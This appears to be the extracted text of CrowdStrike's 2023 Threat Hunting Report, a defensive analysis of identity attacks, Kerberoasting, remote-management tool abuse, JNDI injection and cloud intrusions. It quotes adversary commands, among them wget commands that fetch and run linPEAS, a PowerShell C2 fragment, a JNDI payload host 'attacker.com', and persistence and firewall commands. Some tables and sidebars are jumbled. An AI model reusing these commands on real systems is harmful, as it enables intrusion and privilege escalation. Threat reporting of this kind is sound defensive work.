Report Crowdstrike 2023 Threat Hunting Report
Report Crowdstrike 2023 Threat Hunting Report
Foreword
Nearly 12 years ago, a scrappy group of technologists and security professionals
came together with a simple idea: building world-class, cloud-delivered endpoint
protection that leverages machine learning and artificial intelligence to create a
highly dynamic security solution that continues to learn and evolve as endpoints
are added and leverages automation to scale.
But the product was only part of the story. This technology would be
continuously augmented by professional, efficient incident responders who
could transform their front-line insights into tangible data to feed it. The final part
of the story is that all of this would be powered by intelligence, drawing on human
expertise and ingenuity across a diverse range of disciplines to provide endpoint
security that is, at its core, informed by today’s threat landscape.
When we launched this idea under the CrowdStrike banner, we told the world
they don’t have a malware problem, they have an adversary problem. Key to this
message is stopping the breaches perpetrated by these adversaries. Through
the combination of technology, people and intelligence, we raised the cost for
these adversaries — and continue to do so every day.
The questions CISOs need to ask their teams are, “Have we gotten faster at
identifying, investigating and remediating today’s threats? Can we detect an
adversary in seven minutes or even seven hours?”
With the release of the CrowdStrike 2023 Threat Hunting Report, we are
announcing the formation of a new defensive unit: CrowdStrike Counter
Adversary Operations. Its mission is to use the collaborative power of hunting
and intelligence to raise the cost of doing business for threat actors and give the
adversary nowhere to hide.
This report is the first of many publications that readers can expect from
CrowdStrike’s newly formed Counter Adversary Operations team. This team
formally unites Falcon OverWatch and CrowdStrike Intelligence under a single
umbrella, deepening the already well-established collaboration between these
teams.
¼ Directly identified approximately one potential intrusion every seven One potential intrusion
minutes. Over the course of a year, this adds up to tens of thousands of approximately every
instances where human-driven hunting was instrumental in uncovering seven minutes
adversaries actively seeking to evade autonomous detection methods.
The new Counter Adversary Operations team will relentlessly track, detect and
ultimately disrupt the adversary no matter when or where they operate.
Adam Meyers
SVP of Intelligence
Contents
Foreword2
Introduction5
Front-Line Snapshot 6
Front-Line Observations 10
Conclusion 45
About CrowdStrike 54
Introduction
Identity threats emerged as the major theme of interactive — aka hands-on-keyboard — intrusions
discovered by the CrowdStrike® Falcon OverWatch™ threat hunting team in the past 12 months. In all aspects
of operations, adversaries looked for ways to broaden their reach, optimize their tradecraft and deepen their impact.
These operations often started with an identity compromise. Adversaries are not relying solely on compromised
valid credentials, either — rather, they demonstrated their capacity to abuse all forms of identification and
authorization, including weak credentials purchased from the underground, and they elevated their phishing
and social engineering tradecraft.
In addition to the broad targeting of identity, several trends stood out this year related to eCrime. First, the continued
exploitation of vulnerable software to gain access, particularly in the case of access brokers,1 demonstrates the need
for organizations to have visibility into their external attack surface. The expanded use of zero-day vulnerabilities and
the speed at which threat actors were able to develop N-day exploits underscore the importance of vulnerability
management and patching. Second, the rampant use of legitimate remote monitoring and management (RMM)
tools illustrates adversaries’ attempts to blend into enterprise noise and avoid detection. SCATTERED SPIDER, for
example, utilizes numerous RMM tools, enabling them to avoid detection for protracted periods of time to access
sensitive data and — more recently — deploy ransomware. Finally, Falcon OverWatch observed adversaries such
as INDRIK SPIDER following their otherwise opportunistic initial access attempts with more tailored follow-on
behaviors.
Consistent with the expectations outlined in last year’s report, Falcon OverWatch observed adversaries’
increased proficiency in attacks against cloud environments. In the past few months, adversaries have continued
to demonstrate that they are adept at navigating all major cloud platforms. In particular, adversaries have been quick
to learn how to take advantage of common misconfigurations or abuse the built-in cloud management tooling.
The concerning reality is that some adversaries appear to have a better handle on victims’ cloud environments
than the organizations themselves.
Finally, cross-platform proficiency is a hallmark of this year’s interactive intrusions. Exemplified by the 3CX
supply chain attack perpetrated by LABYRINTH CHOLLIMA — and uncovered by CrowdStrike — many of today’s
adversaries are able to confidently navigate multiple operating systems. Whether the adversary is leveraging native
applications or cross-platform development tools, the need to be flexible and adapt to any target environment is
paramount to continued operational success.
Reader Note:
This report is based on insights from the Falcon OverWatch threat hunting team from July 1, 2022,
through June 30, 2023.2 The findings relate specifically to interactive intrusion activity — that is, activity
where a threat actor was operating with hands-on-keyboard in a victim environment. Targeted adversaries
refer to state-nexus adversaries.
1 Access brokers are threat actors that specialize in breaching networks with the intention of selling or providing that access to others.
2 Unless stated otherwise, the terms “this year,” “the last year” or “the past year” used throughout the report refer to the period from July 1, 2022, to June 30, 2023.
Front-Line Snapshot
In the reporting period from July 1, 2022, through June 30, 2023, Falcon OverWatch observed interactive intrusion
volumes continue to climb, with a total year-over-year increase of 40%. The overall distribution of interactive intrusion
activity by threat type remained relatively constant this year compared to previous years, with a small decrease in the
proportion of targeted intrusion activity.
For the sixth consecutive year, the technology vertical topped the list for the most frequently targeted industry
vertical. The telecommunications vertical, which normally holds the second spot, was displaced this year by the
financial vertical, which saw a spike in targeting.
TECHNOLOGY 21%
TECHNOLOGY
FINANCIAL TELECOMMUNICATIONS
17%
13%
RETAIL GOVERNMENT
FINANCIAL 11%
HEALTHCARE
SERVICES 7%
TELECOMMUNICATIONS
MANUFACTURING
21%
Change in relative
TECHNOLOGY
frequency compared
ACADEMIC to July 2021 to June 2022 10%
RETAIL
FINANCIAL 7%
0% 5% 10% 15% 20% 25%
Figure 2. Top 10 targeted verticals, Figure 3. Top five targeted verticals separated by
July 2022 to June 2023 adversary threat type, July 2022 to June 2023
In the past year, the volume of interactive intrusion activity against the financial services industry increased by
over 80%. Defenders in the financial industry should watch this trend closely, as the increased volume of activity
is matched by an increased diversity of threats. This year, Falcon OverWatch uncovered activity in the financial
industry spanning all adversary motivation types and targeting all three major operating systems as well as cloud
infrastructure.
North Korean adversaries are the most aggressive state-sponsored adversaries to target the financial sector. They
continue to engage in prolific, financially motivated operations primarily targeting financial and financial technology
(fintech) organizations. eCrime threat actors also routinely target the financial sector. Though some adversaries
focus on stealing cryptocurrency or non-fungible tokens (NFTs), opportunistic big game hunting (BGH) ransomware
and data theft campaigns remain the primary eCrime threat to financial institutions. Due to the victim organization's
need to maintain system uptime and the sensitive nature of the sector, eCrime threat actors likely conclude that
financial institutions are willing and able to pay ransom demands.
Academic
Agriculture
Consulting
Energy
Engineering
Financial
Government
Healthcare
Hospitality
Insurance
Legal
Manufacturing
Media
Mining
Nonprofit
Pharmaceutical
Real Estate
Retail
Services
Technology
Telecommunications
Transportation and Logistics
Figure 4. Intrusion activity by threat actor heat map, July 2022 to June 2023
Please note the following about the data presented in this heat map:
¼ The heat mapping represents the number of distinct adversaries active within a particular vertical
¼ The heat mapping does not represent the total number of intrusion attempts within a vertical, as multiple
intrusions by the same adversary group are represented only once
¼ Attribution to a high degree of confidence is not always possible. This table does not reflect any unattributed
activity that occurred in any industry verticals
Targeted intrusion activity during this period notably correlated with the respective intelligence collection
requirements and other priorities of each adversary grouping. The most straightforward of these is North Korean
adversaries’ targeting of financial sector entities — as well as finance-related consulting services — as part of a
widespread currency generation effort meant to leverage cryptocurrency theft and, to a lesser extent, ransomware.
The diversity of sectors targeted by Iranian (KITTEN) and Chinese (PANDA) state-nexus adversaries are reflective
of two distinct, but similar, tradecraft strategies. KITTEN adversaries increasingly rely on opportunistic exploitation
of entities of interest, and PANDA adversaries continue to expand operations to achieve coverage across as many
targets as possible.
The technology sector continues to be a high-value target for eCrime adversaries, with BGH operations posing
the most prevalent eCrime threat to the sector. The technology sector’s reliance on and access to highly sensitive
data make it an especially attractive target for BGH operators. BGH operations continue to rely on ransomware and
data theft. Other prominent eCrime threats to the technology sector include enabling services, access brokers and
information theft campaigns.
MITRE ATT&CK HEAT MAP - TOP FIVE TECHNIQUES ACROSS EACH TACTIC AREA
System Network
Indicator Removal Unsecured Credentials Configuration Discovery Lateral Tool Transfer
Obfuscated Files or Credentials from Remote System Discovery Remote Service Session
Information Password Stores Hijacking
Data Staged Application Layer Protocol Exfiltration Over Web Service Service Stop
Data from Local System Remote Access Software Exfiltration Over C2 Channel Inhibit System Recovery
Figure 5. MITRE ATT&CK heat map highlighting the top five techniques Falcon OverWatch observed
adversaries use in each tactic area, June 2022 to July 2023
Falcon OverWatch tracks interactive intrusion activity against the MITRE ATT&CK® Enterprise Matrix, a framework that
categorizes and tracks adversary behavior.3
This heat map illustrates the top five techniques observed across the interactive intrusion activity discovered by Falcon
OverWatch in each tactic area during the past year. The technique prevalence underscores a notable shift toward
exploitation of identity across all stages of adversarial operations. This shift mirrors the evolution of organizations
adapting to an increasingly disparate workforce, highlighting the morphing nature of the modern perimeter.
No longer defined by a rigid outer shell, organizations today rely on identity as the pivotal control point. The consistent
appearance of valid accounts across various tactics highlights the intensification of adversaries' strategic use of trusted
accounts to gain initial access, establish persistence, elevate privileges and evade defenses. The concerning ease with
which adversaries can gain initial access — often simply through purchases — blurs the distinction between legitimate
users and imposters. Identifying such stealthy intruders necessitates proactive, identity-based threat hunting combined
with a robust understanding of an organization's unique operational landscape.
For full details of the techniques and sub-techniques observed by Falcon OverWatch, see the Falcon OverWatch 2023
MITRE ATT&CK heat map.
Front-Line
Observations
Adversaries Advance the
Frontier of Identity Threats
Key Facts
Today, 80% of breaches use compromised identities.4 The abuse of identity,
particularly when coupled with creative defense evasion methodologies, enables and Figures
adversaries to hide in plain sight. Despite identity being widely recognized as a
growing security threat, the full spectrum of identity threats is not always well
at a Glance:
understood.
Reader Note:
62%
OF INTERACTIVE INTRUSIONS
Identity data refers to any information that uniquely identifies an individual INVOLVING THE ABUSE OF
or entity (such as data associated with accounts) and authentication and VALID ACCOUNTS, WITH 34%
access controls (such as credentials, permissions, security tokens or digital OF INTRUSIONS SPECIFICALLY
certificates). This scope may extend to additional factors of authentication INVOLVED THE USE OF DOMAIN
or data that can be used for the purposes of identity verification. A full list ACCOUNTS OR DEFAULT ACCOUNTS
can be seen on page 16.
To ensure environments remain protected, hunters must work with the broadest
possible definition of identity, as these types of data are prime targets for 160%
adversaries looking to maintain access, enable lateral movement and steal
INCREASE IN ATTEMPTS TO
information. GATHER SECRET KEYS AND OTHER
CREDENTIAL MATERIALS VIA
Taking a closer look at the specific techniques involved in identity threats reveals
CLOUD INSTANCE METADATA APIs
an interesting duality between new and old. Falcon OverWatch recently discovered
and documented the abuse of network provider dynamic link libraries (DLLs) as a
means to harvest valid credentials. A network provider DLL enables the Windows
operating system to communicate with other types of networks by providing
support for different networking protocols. This newly documented sub-technique5
583%
sees adversaries operate without the need to touch the Local Security Authority INCREASE IN KERBEROASTING
Subsystem Service (LSASS) or dump the system Security Account Manager (SAM) ATTACKS (A SUB-TECHNIQUE
hive, both of which are often highly monitored by security tools. This sub-technique OF STEAL OR FORGE KERBEROS
provides an evasive way to access valid account details. In contrast, threat hunters TICKETS), WITH VICE SPIDER
also tracked a surge in an old and well-understood technique — Kerberoasting — RESPONSIBLE FOR 27% OF ALL
with the resurgence likely due to continued effectiveness. KERBEROASTING ATTACKS
Over the past year, Falcon OverWatch observed a staggering 583% increase
in Kerberoasting attacks6 to escalate privileges and enable lateral movement
within a victim’s environment (see Figure 6). Windows devices use the Kerberos
authentication protocol, which grants tickets to provide users access based on
service principal names (SPNs). Kerberoasting specifically involves the theft of
tickets associated with SPNs. These tickets contain encrypted credentials that can
be cracked offline using brute-force methods to uncover the plaintext credentials.
2022 2023
Reporting Reporting
Period Period
6 For more information on this sub-technique, see the MITRE website (https://attack.mitre.org/techniques/T1558/003/)
© 2023 CrowdStrike, Inc. All rights reserved.
or the detailed article from CrowdStrike (https://www.crowdstrike.com/cybersecurity-101/kerberoasting/).
NOWHERE TO HIDE 12
CROWDSTRIKE 2023 THREAT HUNTING REPORT
Kerberoasting in Action
In an intrusion by VICE SPIDER, Falcon OverWatch discovered hands-on-keyboard activity against a victim
organization in the academic sector. The compromise was associated with multiple hosts across virtual desktop
infrastructure (VDI). The threat actor performed basic host reconnaissance to enumerate domain trusts using nltest,
then enumerated administrator permissions groups and performed connectivity tests to outbound infrastructure.
Next, the threat actor attempted to exploit the ZeroLogon vulnerability in an attempt to escalate privileges and then
tested connectivity to a command-and-control (C2) server using ping. The threat actor then executed SystemBC
and SocksProxyGo through PowerShell to proxy connections to their C2 infrastructure. The adversary was clearly
mindful of being detected and took several steps to cover their tracks, including setting their proxy connection to
operate over non-standard ports, creating a new firewall rule masquerading as a Windows update, and clearing the
Security, Application and System logs using wevtutil. Further, they removed the registry entry for RunMRU and
TypedPaths — two locations that would shed light on their interactive activity on the system.
$domain = '[REDACTED IPAddress]' # host $dport = 4001 # port $x = New-Object byte[] 50 For
($i=0; $i -ne 50; $i++)
After this, the adversary executed a script to perform a Kerberoasting attack and enumerate SPNs. VICE SPIDER’s
likely goal was to capture these SPNs to identify Windows service accounts and extract the password hashes. This
was confirmed when Falcon OverWatch found the adversary using the Hashcat tool in an attempt to brute-force the
password hashes.
The following is an expanded version of the script above, which was determined to be associated with the Invoke-
Kerberoast.ps1 PowerShell script. The Kerberoasting activity below involves Active Directory being queried to
request the username and SPN associated with accounts that have an SPN set. The $TicketHexStream variable is
storing the hexadecimal value of the Kerberos service ticket, which is then processed to extract a hash that can be
used for offline password cracking.
1
Rubeus Rubeus is a C# tool that allows an adversary to interact
with the Kerberos authentication mechanism.
Adversaries use this tool to perform attacks such
as ticket manipulation, password brute-forcing,
Kerberoasting, and Golden Ticket and Silver Ticket
attacks.
2
PowerSploit PowerSploit is an exploit framework that contains various
modules, including Invoke-Kerberoast, a module designed
Adversaries use this tool to automate the process of
SPN enumeration, ticket manipulation and password
to automate Kerberoasting functions. cracking.
3
BloodHound/ BloodHound is a web-based tool that can be used
to perform reconnaissance on Active Directory
Adversaries typically use these tools together to
understand and visualize a target’s Active Directory
SharpHound environments and identify attack paths that can be used in objects and environment, and then generate data
the context of a Kerberoasting attack. that can be used to identify potential attack paths and
privilege escalation opportunities.
SharpHound is a PowerShell-based tool that can be used
to enumerate Active Directory environments and retrieve
data that can be visualized within BloodHound.
4
Impacket Impacket is a toolset of Python-based utilities that can
be used to perform a wide range of attacks, including
The GetUserSPNs utility can be used to enumerate
service accounts within Active Directory by requesting
launching attacks to exploit weaknesses in the Kerberos service tickets for any accounts with associated SPNs.
protocol. Popular Impacket tools for performing
Kerberoasting attacks include GetUserSPNs and The Ticketer utility can be used to request service
Ticketer. tickets with specific encryption types, which may
cause the domain controller to encrypt the ticket with
the user's password hash. This utility can then decrypt
the service ticket to extract the password hash of a
user.
5
SharpRoast SharpRoast is a C# tool within the SharpTools toolset.
The SharpRoast tool can be used to interact with the
Adversaries can use this tool to perform SPN
enumeration and output results into various formats
Kerberos protocol to perform Kerberoasting attacks. for analysis. The tool also performs the same functions
as Ticketer, whereby it can decrypt service tickets to
extract the password hash of a user.
Table 1. Top five tools Falcon OverWatch observed adversaries use for Kerberoasting attacks, July 2022 to June 2023
Defensive Countermeasures
Falcon OverWatch increasingly sees adversaries using Kerberoasting to gain a
greater foothold within Windows environments and escalate privileges. Defenders
should investigate for signs of this activity to help identify protocol weaknesses and
weak or compromised accounts, and find opportunities to improve detections.
The following recommendations will allow hunters to identify or mitigate this type of
attack within their environment:
When discussing identity threats, it is important to distinguish different ways an entity can be identified and
authenticated to a system. Though the majority of interactive intrusions observed by Falcon OverWatch involve
abuse of valid accounts7 — which in most instances presents as username and password combinations — intrusions
often leverage other factors of authentication and identifying material. Some of the most common methods of
identification and authentication are shown in Figure 7.
¼ Attempts to gather secret keys and other credential materials via cloud instance metadata APIs, which rose by
160% year over year
¼ Exploitation of weaknesses in Kerberos security to steal or forge authentication material, which rose by 410%
year over year (the specific sub-technique of Kerberoasting rose by 583% year over year)
¼ Abuse of Active Directory Certificate Services (AD CS), which was seen in the 2023 reporting period but not
the 2022 reporting period
7 For more information on this technique, see the MITRE website: https://attack.mitre.org/techniques/T1078/.
© 2023 CrowdStrike, Inc. All rights reserved.
NOWHERE TO HIDE 17
CROWDSTRIKE 2023 THREAT HUNTING REPORT
This targeting of identity and authentication material showcases that valid accounts are highly prized by adversaries.
Over the past year, 62% of all interactive intrusions used valid accounts. Adversaries do not stop there — 26% of all
intrusions involved attempts to dump credentials,8 and 11% involved attempts to target unsecured credentials.9 All
of this can facilitate access to sensitive data or support privilege escalation or lateral movement. Falcon OverWatch
also observed adversaries targeting credentials in password stores,10 capturing user input11 and modifying the
authentication process12 itself.
Threat actors are also seeking new and novel tactics in operations aimed at gaining credentials for cloud
environments. In November 2022, a victim organization in a CrowdStrike Services case accidentally published its
cloud service provider root account’s access key credentials to GitHub. Within seconds, automated scanners and
multiple threat actors attempted to use the compromised credentials. The speed with which this abuse was initiated
suggests that multiple threat actors — in efforts to target cloud environments — maintain automated tooling to
monitor services such as GitHub for leaked cloud credentials.
Defenders may wonder how else adversaries are obtaining these valid login details. Interestingly, only 14% of
intrusions where valid accounts were used also involved a brute-force13 attack. Of the remaining 86% of intrusions
involving a valid account, over half originated from a system external to the organization. This suggests these
accounts were likely obtained through credential harvesting, password reuse, phishing, an insider threat, or session
hijacking, or they were purchased from an initial access broker.
Defensive Countermeasures
Audit your user accounts.
A key step for defenders in identifying identity-based risks in their organization is auditing the vast array of different
user accounts that may be available to an adversary and ensuring that these implement the principle of least privilege
and role-based access control.
8 For more information on this technique, see the MITRE website: https://attack.mitre.org/techniques/T1003/.
9 For more information on this technique, see the MITRE website: https://attack.mitre.org/techniques/T1552/.
10 For more information on this technique, see the MITRE website: https://attack.mitre.org/techniques/T1555/.
11 For more information on this technique, see the MITRE website: https://attack.mitre.org/techniques/T1056/.
12 For more information on this technique, see the MITRE website: https://attack.mitre.org/techniques/T1556/.
13 For more information on this technique, see the MITRE website: https://attack.mitre.org/techniques/T1110/.
14 For more information, see https://www.crowdstrike.com/resources/white-papers/streamline-your-zero-trust-journey/.
Falcon OverWatch analyzes and records its interactive intrusion data using MITRE
ATT&CK as an organizing framework. In the process of examining intrusion activity,
analysts occasionally discover new techniques and sub-techniques not accounted
for by the framework. Falcon OverWatch recently recommended to MITRE the
creation of a new sub-technique called “Network Provider DLL” under the technique
“Modify Authentication Process.” The new sub-technique was accepted and
included in ATT&CK v13 under ID T1556.008.15
Over the past year, Falcon OverWatch observed malicious network provider DLLs
being abused to harvest usernames and passwords by writing these to disk for
exfiltration. In multiple intrusions where Modify Authentication Process: Network
Provider DLL was leveraged, an adversary was observed conducting intrusions
against Microsoft Exchange servers. This specific activity has been observed
since at least March 2022, with increasing operational tempo into late 2022.
This coincides with proof-of-concept code that was publicly released for two
vulnerabilities: CVE-2022-41040 and CVE-2022-41082 (collectively, these are
commonly referred to as ProxyNotShell).
15 For more information on this sub-technique, see the MITRE website: https://attack.mitre.org/techniques/T1556/008/.
ADVERSARY
CLEARTEXT
1 5 USERNAME/PASSWORD
Adds NetworkProvider
subkey to newly created 4
service MPNOTIFY PROCESS
Authenticates to
USER Exchange server WINLOGON PROCESS
2 3
The most notable change in the past year was the increase in instances of data
theft and extortion without the use of ransomware — a trend the CrowdStrike
2023 Global Threat Report revealed grew by 20% year over year in 2022. This
development is the latest demonstration of the business acumen of today’s
Key Facts and
eCrime adversaries and their ability to continually optimize their operations. Figures at a
Although the impact of eCrime operations is often what grabs headlines, what Glance:
happens before extortion is what matters most when it comes to proactive
defense. Falcon OverWatch examines threat activity from a distinctly defensive
vantage point. Rather than focusing retrospectively on the impact of intrusions,
threat hunters focus on the patterns of activity that provide the earliest possible
312%
signal of intrusion. Looking back over the past year, Falcon OverWatch hunters INCREASE IN ADVERSARY USE OF
uncovered both unexpected and expected trends emerging across interactive RMM TOOLS YEAR OVER YEAR
eCrime intrusions.
147%
One development observed by Falcon OverWatch this year is a shift in follow-on
behaviors from INDRIK SPIDER. Falcon OverWatch saw several instances of
otherwise opportunistic initial access activity evolve into more tailored follow-on
attack patterns once the threat actor identified that they had caught a lucrative INCREASE IN ACCESS BROKER
victim in their widely cast net. ADVERTISEMENTS IN CRIMINAL OR
UNDERGROUND COMMUNITIES16
This year’s anticipated trends involve the abuse of tried-and-true methods to
access and navigate victim environments. These methods include exploitation of
20+%
vulnerabilities and the use of RMM tools.
16 For more information on how to gain visibility into cybercrime activities, see the CrowdStrike Falcon® Intelligence Recon webpage.
17 For more information on how to protect your external attack surface, see the CrowdStrike Falcon® Surface webpage.
Over the past year, INDRIK SPIDER was at the forefront of this trend, tailoring
their operations based on characteristics of the compromised host and the victim
organization. In multiple intrusions, INDRIK SPIDER took a multi-phased approach,
beginning with the use of the SocGholish tool to opportunistically find victims.
This was followed by the use of a malicious JavaScript file that runs discovery
commands — in particular, these commands look to see whether the victim host is
domain-joined. Upon discovering domain-joined hosts, INDRIK SPIDER transitioned
from scripted to interactive activity. In further evidence that the interactive follow-on
activity was tailored to the victim organization, Falcon OverWatch discovered that
the malicious DLLs deployed to the target victims were environmentally keyed with
each targeted organization’s domain name.
Upon execution,18 the FBU conducts multiple scripted19 discovery activities before
relaying the data over C2 infrastructure and evaluating the response it receives.
18 For more information on this sub-technique, see the MITRE website: https://attack.mitre.org/techniques/T1204/002/.
19 For more information on this technique, see the MITRE website: https://attack.mitre.org/techniques/T1059/.
20 For more information on this technique, see the MITRE website: https://attack.mitre.org/tactics/TA0007/.
21 For more information on this technique, see the MITRE website: https://attack.mitre.org/techniques/T1020/.
When NetSupport RAT installation occurred, it was installed almost instantly. This
indicates the adversary used a set of predefined conditions to determine whether
to deploy NetSupport RAT. To deploy NetSupport RAT, execution of a PowerShell
download cradle occurs to retrieve and execute a script masquerading as an
SVG image file. The masqueraded script downloads the RAT, sets persistence via
the registry run key22 for the current user and executes the RAT using Windows
Management Instrumentation (WMI).
What Is
Phase Three: Go Hands-On
Environmental
In the SocGholish-based intrusions that leveraged a BlisterLoader-packed Cobalt
Keying?
Strike implant, Falcon OverWatch observed a distinct delay between initial access
and automated discovery actions, and observed follow-on activity. This delay is Environmental keying prevents malicious
binaries from executing their intended
likely due to the transition from automated malicious activity to hands-on-keyboard
payload unless they are executing within a
activity. Falcon OverWatch found that the packed DLLs were environmentally
target environment. This is commonly used
keyed23 with each targeted organization’s domain name, leading Falcon OverWatch
in targeted intrusions to hinder attempts to
to conclude this activity was tailored to the victim. The environmental keying allowed
reverse engineer, sandbox or detect with
the resulting payload to be unpacked and executed only in the correct environment. antivirus (AV) products and hide the tactics
and techniques leveraged by the malicious
Written DLLs containing the packed Cobalt Strike implant were also named after
binary.
the compromised organization in which they were executed or were otherwise
found to be masquerading under the name of a third-party security company in One method of environmental keying noted
instances where persistence was established. during INDRIK SPIDER-related intrusions
is the use of BlisterLoader, which checks
During this phase of the intrusions, the threat actor also conducted further for a system’s Active Directory domain
discovery activity — including enumerating domain trusts24 and domain controllers name upon executing and immediately
and attempting credential access using the cmdkey /list command. Further terminates if the hash does not match a
commands and scripts were also run that directed their output to temporary files hardcoded value.
for later exfiltration.
22 For more information on this sub-technique, see the MITRE website: https://attack.mitre.org/techniques/T1547/001/.
23 For more information on this sub-technique, see the MITRE website: https://attack.mitre.org/techniques/T1480/001/.
24 For more information on this technique, see the MITRE website: https://attack.mitre.org/techniques/T1482/.
Productivity applications often sit on the edge of an organization’s infrastructure and can
be missed when security controls are enforced across the rest of the environment. Without
an external attack surface management (EASM) solution,26 defenders can easily lose track
of just how many applications and services are exposed externally — increasing the risk of
exposure to a vulnerability or chain of vulnerabilities. Given the scale at which vulnerabilities
are disclosed, it is unsurprising that many organizations struggle to keep up with timely
remediation. For this reason, defenders need to look beyond the Common Vulnerabilities
and Exposures (CVEs) and ensure post-exploitation activity can be quickly identified and
effectively controlled. The ability to readily identify malicious follow-on activity within an
environment is also an effective control against unpatched or undisclosed vulnerabilities.
Since early 2023, a series of compromises involving Oracle WebLogic Server (WLS) were
associated with Java Network Discovery Interface (JNDI) injection via CVE-2023-21839.
This activity aligned with either opportunistic eCrime activity using a publicly available exploit
or an independently developed exploit variant associated with suspected China-nexus
targeted intrusion activity. This variant was observed in historic WLS activity targeting a
different vulnerable Java object than those publicly known. Based on these observations,
CrowdStrike Intelligence assesses that a variation of CVE-2023-21839 WLS instances has
been repeatedly exploited in the wild since late February 2023.
25 For more information on this technique, see the MITRE website: https://attack.mitre.org/techniques/T1190/.
26 For more information, see https://www.crowdstrike.com/products/security-and-it-operations/falcon-surface/.
Victim redirected to
3 attacker HTTP server
4
Load malicious Java class
ldap://attacker.com
(attacker HTTP server)
Figure 9. JNDI injection to achieve remote code execution (RCE) via CVE-2023-21839
Another Oracle exploit — abusing an arbitrary file overwrite vulnerability impacting E-Business Suite (CVE-2022-
21587) — was also repeatedly observed during early 2023. This included suspected CVE-2023-21839 exploitation
by the notorious access broker PROPHET SPIDER, the most prolific eCrime adversary exploiting public-facing web
applications this past year.27
Access brokers share some operational commonalities with state-nexus threat actors: gaining initial access to an
organization through exploitation, attempting to remain hidden from traditional detection systems and establishing
persistent access to an organization until follow-on activity occurs.
Access brokers sell their established access to a variety of clientele. This has a dual impact on the eCrime
ecosystem. First, it lowers the barrier to entry for individuals looking to conduct criminal operations. Second, it
allows for established adversaries to focus their efforts on honing their post-exploitation tradecraft to achieve their
malicious objectives more efficiently.
In the past year, there has been a 147% increase in access broker advertisements in criminal or underground
communities. This stark increase in supply of compromised credentials is likely indicative of growing demand from
adversaries looking to buy these credentials for follow-on activity.
Defensive Countermeasures
Prioritize identity protection.
With identity becoming the new perimeter that adversaries exploit, defenders must
adapt their security measures accordingly to stay ahead of threats and counteract
tactics for gaining initial access.
RMM tools allow information technology (IT) administrators TOP 10 RMM TOOLS
July 2022 to June 2023 vs. July 2021 to June 2022
to remotely support workstation and server endpoints.
However, these packages are commonly abused by
adversaries seeking to gain and maintain a C2 channel into ANYDESK
This past year, Falcon OverWatch observed RMM tools ATERA AGENT
used in approximately 14% of all intrusions, and the volume
TEAMVIEWER
of intrusions where RMM tools were leveraged by threat
actors increased by 312% year over year. Figure 10 REMOTE DESKTOP PLUS
FLEETDECK
The top tool used this past year by a large margin was
2023
AnyDesk. In intrusions where AnyDesk was observed, TIGHTVNC
2022
eCrime activity comprised 73% of the intrusions, targeted N-ABLE REMOTE
ACCESS SOFTWARE
activity comprised 4% of intrusions and unattributed activity
made up the remaining 23%. ScreenConnect and Atera
0% 1% 2% 3% 4% 5% 6% 7%
Agent were also routinely used by eCrime threat actors.
The RustDesk installer may configure a Windows host firewall rule for client
communication:
The RustDesk installer may add registry keys for the installed client:
reg add
HKEY_CLASSES_ROOT\.rustdesk\shell\open\command /f /ve
/t REG_SZ /d "\"C:\Program Files\RustDesk\RustDesk
exe\" --play \"%1\""
reg add
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\Uninstall\RustDesk /f /v
UninstallString /t REG_SZ /d "\"C:\Program Files\
RustDesk\RustDesk.exe\" --uninstall"
FleetDeck currently supports agents for the Windows operating system, with
agents for macOS and Linux in development. Remote agents operate over TCP port
443, which, depending on host and network firewall configurations, may facilitate
egress from victim environments. Like RustDesk, the tool is new and less likely to be
detected than more prevalent RMM tool choices. Unlike RustDesk, the product is a
commercial offering, and source code is not available.
29 For more details of SCATTERED SPIDER’s use of RMM tools, see this related blog:
https://www.crowdstrike.com/blog/analysis-of-intrusion-campaign-targeting-telecom-and-bpo-companies/.
ping fleetdeck.io
C:\Users\[REDACTED Path]\Downloads\fleetdeck-agent-[REDACTED
22CharacterKey].exe
Note that the agent installer listed above can be executed silently by appending the
-silent flag to the command.
The adversary created a Windows host firewall rule via PowerShell for FleetDeck
client communication:
C:\WINDOWS\Sysnative\WindowsPowerShell\v1.0\powershell.exe -Command
"New-NetFirewallRule -DisplayName 'FleetDeck Agent Service' -Name
'FleetDeck Agent Service Command' -Direction Inbound -Program 'C:\
Program Files (x86)\FleetDeck Agent\fleetdeck_agent_svc.exe' -Action
Allow"
Defensive Countermeasures
Monitor and conduct active hunts for
newly identified threats.
The RMM tool landscape is dynamic. As new tools are identified or known tools add
new functionality, research the new RMM behaviors and actively review logs for
evidence of execution.
Over the past few years, the adoption of cloud-based technologies has
experienced a meteoric rise, with organizations from all sectors embracing this
paradigm shift. The benefits that cloud computing provides have made it an
indispensable part of businesses’ modern IT infrastructure. However, the rapid
surge in demand for cloud services, along with the complexity of cloud management
and controls, has led to a knowledge gap in properly securing these environments. Key Facts
The nature of the attack surface has changed and presents significant security
challenges for organizations with a cloud presence. and Figures
In the past year, Falcon OverWatch has observed numerous instances of insecure at a Glance:
configurations as well as built-in cloud platform functionality being abused by
3X
adversaries to progress their intrusions. As first reported in the CrowdStrike 2023
Global Threat Report, there was a threefold increase in cases involving cloud-
conscious threat actors coupled with a 95% increase in cloud exploitation from
2021 to 2022. It is clear that adversaries are aware of the importance of the cloud INCREASE IN THE USE OF LINUX
and tenacious in their efforts to access cloud assets. PRIVILEGE ESCALATION TOOL
LINPEAS
When it comes to securing the cloud, the old security adage “know thy systems''
is particularly pertinent. Adversaries are quick to take advantage of visibility and
95%
knowledge gaps.
INCREASE IN CLOUD
EXPLOITATION IN 2022
3X
INCREASE IN CASES INVOLVING
CLOUD-CONSCIOUS THREAT ACTORS
Falcon OverWatch detected several intrusions at the cloud workload level where
adversaries gained access to a cloud server and used the Linux privilege escalation
tool linPEAS to enumerate the environment. Although linPEAS has been around
for several years, in the past year, Falcon OverWatch saw its use by eCrime and
targeted intrusion adversaries triple.
wget https[:]//github[.]com/carlospolop/PEASS-ng/releases/download/
[REDACTED Path]/linpeas_darwin_arm64
mv linpeas_darwin_arm64 x
chmod +x x
./x
Not all ingress of the linPEAS tool comes from the official GitHub repository
— adversaries are also known to stage tooling to sources under their control.
Reasons for this may include ready access to custom-compiled versions to evade
signature-based detection, as well as avoiding source URLs that identify the tooling.
In this second example, Falcon OverWatch observed the adversary attempting to
download linPEAS from a common file-sharing website after a previous attempt
from the GitHub repository was prevented:
wget https[:]//github[.]com/carlospolop/PEASS-ng/releases/download/
[REDACTED Path]/linpeas_linux_amd64 -O aa
The cloud discovery module of linPEAS can allow access to sensitive information
about cloud environments. However, these examples also highlight a long-term,
persistent problem Falcon OverWatch observes across many intrusions: Victim
environments are configured in a way that enables the adversary to access external
resources from within the victim environment to download additional malware.
Defensive Countermeasures
On-premises security best practices
apply in the cloud.
